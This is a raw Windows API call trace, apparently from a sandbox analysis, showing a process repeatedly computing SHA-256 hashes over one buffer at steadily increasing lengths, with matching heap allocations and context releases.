	[0199.654] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.654] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0199.654] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.654] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26913c0
	[0199.654] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26913c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26913c0, pdwDataLen=0x1283b0) returned 1
	[0199.654] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.654] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.654] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.654] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.654] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0199.654] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.654] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26913e8
	[0199.655] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26913e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26913e8, pdwDataLen=0x1283b0) returned 1
	[0199.655] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.655] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.655] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.655] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.655] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0199.655] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691410
	[0199.655] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691410, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691410, pdwDataLen=0x1283b0) returned 1
	[0199.655] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.655] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.655] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.655] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.655] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0199.656] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691438
	[0199.656] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691438, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691438, pdwDataLen=0x1283b0) returned 1
	[0199.656] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.656] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.656] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.656] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.656] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0199.656] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691460
	[0199.656] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691460, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691460, pdwDataLen=0x1283b0) returned 1
	[0199.656] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.656] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.656] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.657] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.657] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0199.657] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691488
	[0199.657] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691488, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691488, pdwDataLen=0x1283b0) returned 1
	[0199.657] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.657] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.657] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.658] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.658] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0199.658] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26914b0
	[0199.658] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26914b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26914b0, pdwDataLen=0x1283b0) returned 1
	[0199.658] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.658] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.658] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.658] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.658] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0199.658] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.658] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26914d8
	[0199.658] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26914d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26914d8, pdwDataLen=0x1283b0) returned 1
	[0199.659] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.659] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.659] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.659] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.659] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0199.659] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691500
	[0199.659] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691500, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691500, pdwDataLen=0x1283b0) returned 1
	[0199.659] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.659] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.659] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.659] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.659] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0199.659] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.659] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691528
	[0199.659] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691528, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691528, pdwDataLen=0x1283b0) returned 1
	[0199.660] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.660] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.660] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.660] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.660] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0199.660] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691550
	[0199.660] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691550, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691550, pdwDataLen=0x1283b0) returned 1
	[0199.660] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.660] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.660] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.660] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.660] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0199.660] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691578
	[0199.661] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691578, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691578, pdwDataLen=0x1283b0) returned 1
	[0199.661] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.661] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.661] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.661] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.661] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0199.661] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.661] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26915a0
	[0199.661] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26915a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26915a0, pdwDataLen=0x1283b0) returned 1
	[0199.661] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.661] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.661] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.661] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.661] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0199.661] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26915c8
	[0199.662] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26915c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26915c8, pdwDataLen=0x1283b0) returned 1
	[0199.662] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.662] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.662] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.662] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.662] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0199.662] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26915f0
	[0199.662] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26915f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26915f0, pdwDataLen=0x1283b0) returned 1
	[0199.662] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.662] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.662] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.662] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.662] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0199.662] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691618
	[0199.663] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691618, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691618, pdwDataLen=0x1283b0) returned 1
	[0199.663] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.663] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.663] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.663] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.663] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0199.663] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691640
	[0199.663] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691640, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691640, pdwDataLen=0x1283b0) returned 1
	[0199.663] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.663] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.663] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.663] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.663] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0199.664] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.664] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691668
	[0199.664] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691668, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691668, pdwDataLen=0x1283b0) returned 1
	[0199.664] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.664] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.664] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.664] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.664] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0199.664] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.664] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691690
	[0199.664] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691690, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691690, pdwDataLen=0x1283b0) returned 1
	[0199.664] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.664] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.664] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.664] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.664] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0199.665] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26916b8
	[0199.665] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26916b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26916b8, pdwDataLen=0x1283b0) returned 1
	[0199.665] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.665] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.665] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.665] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.665] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0199.665] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26916e0
	[0199.665] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26916e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26916e0, pdwDataLen=0x1283b0) returned 1
	[0199.665] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.665] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.665] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.666] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.666] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0199.666] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691708
	[0199.666] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691708, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691708, pdwDataLen=0x1283b0) returned 1
	[0199.666] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.666] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.666] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.666] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.666] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0199.666] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691730
	[0199.666] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691730, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691730, pdwDataLen=0x1283b0) returned 1
	[0199.666] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.666] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.666] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.667] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.667] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0199.667] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691758
	[0199.667] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691758, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691758, pdwDataLen=0x1283b0) returned 1
	[0199.667] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.667] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.667] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.667] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.667] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0199.667] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691780
	[0199.667] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691780, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691780, pdwDataLen=0x1283b0) returned 1
	[0199.667] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.667] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.668] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.668] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
